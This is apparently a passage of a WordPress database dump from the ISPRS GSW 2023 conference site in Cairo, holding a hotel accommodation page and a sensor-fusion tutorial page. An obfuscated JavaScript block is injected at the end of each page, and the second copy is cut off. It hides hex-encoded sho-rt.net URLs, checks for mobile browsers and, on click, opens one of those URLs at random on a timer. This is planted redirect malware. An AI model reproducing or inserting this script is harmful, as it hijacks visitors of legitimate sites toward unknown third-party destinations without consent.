data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"font-size: 24pt; color: #ffff00;\">Flamenco Cairo Hotel</span></h2>\r\n<h4><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"https://www.flamencohotels.com/web/?page_id=5462\">Start – Flamenco (flamencohotels.com)</a></strong></span></h4>\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m16!1m12!1m3!1d27631.27179417239!2d31.19188108296991!3d30.039469195243615!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!2m1!1sFlamenco%20Cairo%20Hotel!5e0!3m2!1sen!2ssa!4v1689724196436!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n<h4><span style=\"color: #3366ff;\">Deadline for the Special Rates is September 1, 2023</span></h4>\r\n&nbsp;\r\n<h2 style=\"text-align: center;\"><span style=\"color: #3366ff;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/flamenco-cairo-hotel/\"><span style=\"font-size: 18pt;\">BOOK NOW </span> </a></strong></span></h2>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\r\n<span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span>\r\n<p style=\"text-align: left;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\r\n\r\n<h4><span style=\"color: #3366ff;\">Deadline for the Special Rates is August 10, 2023</span></h4>\r\n<h2 style=\"text-align: center;\"><span style=\"color: #3366ff; font-size: 14pt;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\"><span style=\"font-size: 24pt;\">BOOK NOW </span> </a></strong></span></h2>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 14pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4788\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Grand Nile Tower Hotel</span></h2>\r\n<ul>\r\n 	<li><span style=\"color: #ffffff;\"><a style=\"color: #ffffff;\" href=\"https://www.grandniletower.com/\">https://www.grandniletower.com/</a></span></li>\r\n</ul>\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3454.091887744032!2d31.22467591511475!3d30.03422158188607!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x14584090695d6421%3A0x201285387107863a!2sGrand%20Nile%20Tower!5e0!3m2!1sen!2ssa!4v1689721277379!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n<h4><span style=\"color: #3366ff;\">Deadline for the Special Rates is </span><span style=\"color: #3366ff;\">September 1, 2023</span></h4>\r\n<h1 style=\"text-align: center;\"><span style=\"color: #3366ff; font-size: 24pt;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/grand-nile-tower-hotel/\">BOOK NOW</a></strong></span></h1>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4730\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Novotel Cairo El Borg</span></h2>\r\n<ul>\r\n 	<li><span style=\"color: #ffffff; font-size: 12pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></strong></span></li>\r\n</ul>\r\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe>\r\n<ul>\r\n 	<li>\r\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\r\n</li>\r\n</ul>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/novotel-cairo-el-borg/\"><span style=\"color: #ffff00;\">BOOK NOW </span> </a></strong></span></h4>\r\n[/dt_banner]\r\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Kempinski Nile Hotel Garden City Cairo</span></h2>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-08-16 18:25:29','2023-08-16 18:25:29','',2685,'https://gsw2023.com/?p=5305',0,'revision','',0),
(5306,1,'2023-08-16 21:33:30','2023-08-16 21:33:30','[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"4011\" img_size=\"1200x1000\"][vc_column_text]\r\n<h5><strong><span style=\"font-size: 10pt;\">Instructor</span></strong></h5>\r\n<h6><strong><span style=\"font-size: 10pt;\">Speaker: Dr. Mohamed M.R. Mostafa</span></strong></h6>\r\n<h6><strong><span style=\"font-size: 10pt;\">Duration: 3 hours</span></strong></h6>\r\n<h6><strong><span style=\"font-size: 10pt;\">Location: ISPRS GSW 2023 – Cairo</span></strong></h6>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"107\"][vc_column_text]<span style=\"font-size: 14pt;\"><strong><u>Speaker’s Bio</u></strong></span>\r\n<p style=\"text-align: justify;\">Dr. Mohamed M.R. Mostafa is the Lead Technical Authority, Mobile Mapping at Trimble Applanix. Dr.\r\nMostafa obtained his Ph.D. in geomatics engineering from The University of Calgary, Canada in 1999. He\r\nhas 24 years of experience in system design, development, integration, calibration, and quality control\r\nfor airborne, land, and indoor surveying and autonomy applications. He has managed and delivered\r\nprojects in the United States, Canada, Europe, Africa, and the Middle East and has contributed to more\r\nthan 250 technical publications, including the Manual of Photogrammetry 5th edition and the DEM User\r\nManual. He served at the ISPRS, ASPRS, and FIG in different capacities in the last 25 years. He received\r\n11 international awards in the last 30 years.</p>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text]\r\n<h1 class=\"fancy-title entry-title start-animation-done start-animation\">Sensor Fusion for Mapping and Navigation</h1>\r\n<h5><span style=\"text-align: justify;\"><strong>Tutorial Topic</strong></span></h5>\r\n<h5><strong>Abstract:</strong></h5>\r\n<p style=\"text-align: justify;\"><strong>Integrated Sensors enable both Surveying and Autonomy technologies. Self-driving vehicles R&amp;amp;D has been evolving over the past decade. Self-driving depends on several integrated technologies including high-definition mapping &amp;amp; map-based localization. The art and science of mapping along with national and international standards and specifications have resulted in adequate quality mapping products especially in the civilized part of the world for construction, infrastructure, and transportation networks but not satisfactory enough for more critical precision needed for autonomous driving. The developing part of the world lacks the existence of many mapping products let alone high-definition maps.\r\nTherefore, on one hand, the lack of high-definition maps might be an obstacle for self-driving vehicle development.\r\nOn the other hand, sensor technology has significantly evolved in the past few decades. Including:\r\n. Multi-head cameras using oblique/nadir components\r\n. Outstanding LiDAR systems and radar sensors\r\n. The evolution of GPS into GNSS that integrated satellite positioning systems from around the globe\r\n. The evolution of inertial sensor technology due to their successful use in the automotive industry to trigger airbags and even their implementation in cellular phones that led to smaller,lighter weight, higher accuracy, and more economical Inertial measuring units IMU’s.\r\nReaping the benefits of these evolving technologies to address the high-definition mapping challenges is the main scope of this proposed session. Designed to be informative, educational, and interactive, the workshop is designed to address the following Audience categories:\r\n. Decision Makers\r\n. Technicians, Technologists, and Engineers Students\r\nThe workshop will start by addressing the ‘here and now’ technological challenges and their associated solutions as well as the future technological development plans to address that. First, the technological </strong><strong>evolution of film into digital cameras, GPS into GNSS, laser profilers into LiDAR systems, INS into IMU,</strong><strong>etc. will be addressed including the algorithmic evolution of aerotriangulation, SLAM, direct georeferencing (DG) and integrated sensor orientation (ISO). The benefits of integrating all the aforementioned technologies in the form of simultaneous adjustment and mapping (SAM). Then, it will address the integration mechanisms of imaging, LiDAR, radar, inertial and GNSS into not onlygeoreferencing an image or LiDAR range but to also leveraging the precise LiDAR ranges and image pixels to improve the precision of the trajectory in post-processing and real time modes.</strong></p>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 